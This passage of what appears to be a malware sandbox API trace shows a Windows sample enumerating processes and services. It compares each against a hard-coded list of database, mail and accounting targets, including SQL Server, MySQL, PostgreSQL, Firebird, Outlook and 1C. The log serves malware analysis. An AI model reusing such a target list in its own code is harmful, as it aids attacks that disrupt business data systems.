(lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0250.756] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0250.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0250.756] lstrlenW (lpString="Spooler") returned 7 [0250.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0250.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0250.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0250.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0250.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0250.757] lstrlenW (lpString="SysMain") returned 7 [0250.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0250.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0250.757] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0250.757] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0250.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0250.757] lstrlenW (lpString="Themes") returned 6 [0250.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0250.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0250.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0250.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0250.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0250.757] lstrlenW (lpString="UxSms") returned 5 [0250.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0250.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0250.757] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0250.757] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0250.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0250.757] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0250.757] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x370 [0250.759] Process32FirstW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.759] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.759] lstrlenW (lpString="System") returned 6 [0250.759] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0250.759] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0250.759] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0250.759] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0250.759] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0250.759] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0250.759] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0250.759] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.760] lstrlenW (lpString="smss.exe") returned 8 [0250.760] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0250.760] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.760] lstrlenW (lpString="csrss.exe") returned 9 [0250.760] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0250.760] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0250.760] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0250.760] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0250.760] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0250.760] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0250.761] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.761] lstrlenW (lpString="wininit.exe") returned 11 [0250.761] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0250.761] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0250.761] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0250.761] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0250.761] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0250.761] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0250.761] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0250.761] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.761] lstrlenW (lpString="csrss.exe") returned 9 [0250.761] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0250.761] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0250.761] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0250.761] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0250.761] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0250.761] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0250.761] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0250.762] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.762] lstrlenW (lpString="winlogon.exe") returned 12 [0250.762] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0250.762] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0250.762] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0250.762] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0250.762] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0250.762] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0250.762] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0250.762] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.763] lstrlenW (lpString="services.exe") returned 12 [0250.763] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0250.763] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0250.763] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0250.763] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0250.763] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0250.763] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0250.763] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0250.763] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.763] lstrlenW (lpString="lsass.exe") returned 9 [0250.763] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0250.763] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0250.763] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0250.763] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0250.763] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0250.763] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0250.763] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0250.763] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0250.764] lstrlenW (lpString="lsm.exe") returned 7 [0250.764] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0250.764] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0250.764] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0250.764] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0250.764] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0250.764] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0250.764] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0250.764] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.764] lstrlenW (lpString="svchost.exe") returned 11 [0250.764] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0250.764] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0250.764] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0250.764] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0250.764] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0250.764] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0250.764] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0250.764] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.765] lstrlenW (lpString="svchost.exe") returned 11 [0250.765] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0250.765] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.765] lstrlenW (lpString="svchost.exe") returned 11 [0250.765] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0250.765] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0250.766] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0250.766] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.766] lstrlenW (lpString="svchost.exe") returned 11 [0250.766] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0250.766] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0250.766] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0250.766] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0250.766] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0250.766] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.766] lstrlenW (lpString="svchost.exe") returned 11 [0250.766] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.767] lstrlenW (lpString="audiodg.exe") returned 11 [0250.767] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.767] lstrlenW (lpString="svchost.exe") returned 11 [0250.767] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.767] lstrlenW (lpString="svchost.exe") returned 11 [0250.767] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0250.767] lstrlenW (lpString="userinit.exe") returned 12 [0250.767] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.768] lstrlenW (lpString="dwm.exe") returned 7 [0250.768] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.768] lstrlenW (lpString="explorer.exe") returned 12 [0250.768] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.768] lstrlenW (lpString="spoolsv.exe") returned 11 [0250.768] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.769] lstrlenW (lpString="taskhost.exe") returned 12 [0250.769] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.769] lstrlenW (lpString="svchost.exe") returned 11 [0250.769] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0250.769] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0250.769] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0250.770] lstrlenW (lpString="reader_sl.exe") returned 13 [0250.770] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0250.770] lstrlenW (lpString="dllhost.exe") returned 11 [0250.770] Process32NextW (in: hSnapshot=0x370, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0250.770] CloseHandle (hObject=0x370) returned 1 [0250.770] Sleep (dwMilliseconds=0x1f4) [0251.291] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea358 [0251.298] EnumServicesStatusExW (in: hSCManager=0x47ea358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0251.298] GetLastError () returned 0xea [0251.298] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dee5b0 [0251.298] EnumServicesStatusExW (in: hSCManager=0x47ea358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0251.298] CloseServiceHandle (hSCObject=0x47ea358) returned 1 [0251.298] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0251.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0251.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0251.299] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0251.299] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0251.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0251.299] lstrlenW (lpString="AudioSrv") returned 8 [0251.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0251.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0251.299] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0251.299] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0251.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0251.299] lstrlenW (lpString="BFE") returned 3 [0251.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0251.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0251.299] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0251.299] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0251.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0251.299] lstrlenW (lpString="CryptSvc") returned 8 [0251.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0251.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0251.299] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0251.299] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0251.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0251.299] lstrlenW (lpString="CscService") returned 10 [0251.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0251.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0251.299] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0251.299] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0251.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0251.299] lstrlenW (lpString="DcomLaunch") returned 10 [0251.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0251.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0251.299] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0251.300] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0251.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0251.300] lstrlenW (lpString="Dhcp") returned 4 [0251.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0251.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0251.300] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0251.300] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0251.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0251.300] lstrlenW (lpString="Dnscache") returned 8 [0251.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0251.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0251.300] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0251.300] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0251.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0251.300] lstrlenW (lpString="DPS") returned 3 [0251.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0251.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0251.300] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0251.300] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0251.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0251.300] lstrlenW (lpString="eventlog") returned 8 [0251.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0251.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0251.300] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0251.300] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0251.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0251.300] lstrlenW (lpString="EventSystem") returned 11 [0251.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0251.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0251.300] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0251.300] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0251.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0251.300] lstrlenW (lpString="gpsvc") returned 5 [0251.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0251.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0251.301] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0251.301] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0251.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0251.301] lstrlenW (lpString="LanmanWorkstation") returned 17 [0251.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0251.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 